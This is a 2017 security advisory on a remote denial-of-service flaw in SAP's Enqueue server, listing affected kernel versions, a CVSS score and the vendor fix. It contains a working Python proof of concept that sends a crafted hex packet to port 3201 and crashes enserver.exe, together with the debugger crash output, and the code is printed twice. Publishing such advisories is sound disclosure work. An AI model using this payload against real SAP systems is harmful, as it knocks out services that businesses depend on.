October 11, 2017

[ERPSCAN-17-049] Denial of Service in Enqueue server

DoS vulnerability

Application: SAP Enqueue
Versions Affected: 7490.17.26.5735
Vendor URL: SAP
Bug: DoS
Reported: 16.05.2017
Vendor response: 17.05.2017
Date of Public Advisory: 10.10.2017
Reference: SAP Security Note 2476937
Author: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Denial of Service
Risk: high priority
Remotely Exploitable: yes
Locally Exploitable: no

CVSS Information

CVSS v3 Base Score: 7.5 / 10
CVSS Base v3 Base Vector:

AV: Attack Vector (Related exploit range)	Network (N)
AC: Attack Complexity (Required attack complexity)	Low (L)
PR: Privileges Required (Level of privileges needed to exploit)	None (N)
UI: User Interaction (Required user participation)	None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component)	Unchanged (U)
C: Impact to Confidentiality	None (N)
I: Impact to Integrity	None (N)
A: Impact to Availability	High (H)

DESCRIPTION

An anonymous attacker can use a special request for crash enserver.exe process on the server.

BUSINESS RISK

A Denial of Service vulnerability can be used to terminate the process of a vulnerable component. For this time, nobody can use this service. This fact negatively influences business processes, system downtime, and business reputation as a result.

VULNERABLE PACKAGES

SAP KERNEL 7.53 64-BIT
SAP KERNEL 7.52 64-BIT
SAP KERNEL 7.51 64-BIT
SAP KERNEL 7.50 64-BIT
SAP KERNEL 7.49 64-BIT
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 32-BIT

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2476937

TECHNICAL DESCRIPTION

Proof of Concept

import socket
PoC = "00000058abcde123000000000000005800000058060100000000000600000000000003e800000001000003e800000003707973617027732d6d6f6e69746f72000000e0b98000020000003b0000000500000003000000060000000400000001"

for i in range(1):
    try:
        sock = socket.socket()
        sock.connect((SAP_SERVER, 3201))
        sock.send(PoC.decode("hex"))
        data = sock.recv(1024)
        sock.close()
    except Exception, ex:
        ex.message
 
 
0:007> r
rax=000000003c4c51a0 rbx=ffffffff8b0602d4 rcx=0000000000000000
rdx=000000003c4c51a0 rsi=000000007ffffe14 rdi=0000000000000002
rip=000000013fa18e82 rsp=00000000414ef2e0 rbp=00000000414ef328
 r8=000000003c4c51a0  r9=00000000414ef3d0 r10=000000013ff6b1e0
r11=0000000000000001 r12=0000000080000200 r13=000000000b0600a4
r14=0000000000000006 r15=0000000000000004
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
enserver!EncOAMParamParse+0x102:
00000001`3fa18e82 0fb64301        movzx   eax,byte ptr [rbx+1] ds:ffffffff`8b0602d5=??

import socket

PoC = "00000058abcde123000000000000005800000058060100000000000600000000000003e800000001000003e800000003707973617027732d6d6f6e69746f72000000e0b98000020000003b0000000500000003000000060000000400000001"

for i in range(1):

try:

sock = socket.socket()

sock.connect((SAP_SERVER, 3201))

sock.send(PoC.decode("hex"))

data = sock.recv(1024)

sock.close()

except Exception, ex:

ex.message

0:007> r

rax=000000003c4c51a0 rbx=ffffffff8b0602d4 rcx=0000000000000000

rdx=000000003c4c51a0 rsi=000000007ffffe14 rdi=0000000000000002

rip=000000013fa18e82 rsp=00000000414ef2e0 rbp=00000000414ef328

r8=000000003c4c51a0 r9=00000000414ef3d0 r10=000000013ff6b1e0

r11=0000000000000001 r12=0000000080000200 r13=000000000b0600a4

r14=0000000000000006 r15=0000000000000004

iopl=0 nv up ei pl nz na po nc

cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206

enserver!EncOAMParamParse+0x102:

00000001`3fa18e82 0fb64301 movzx eax,byte ptr [rbx+1] ds:ffffffff`8b0602d5=??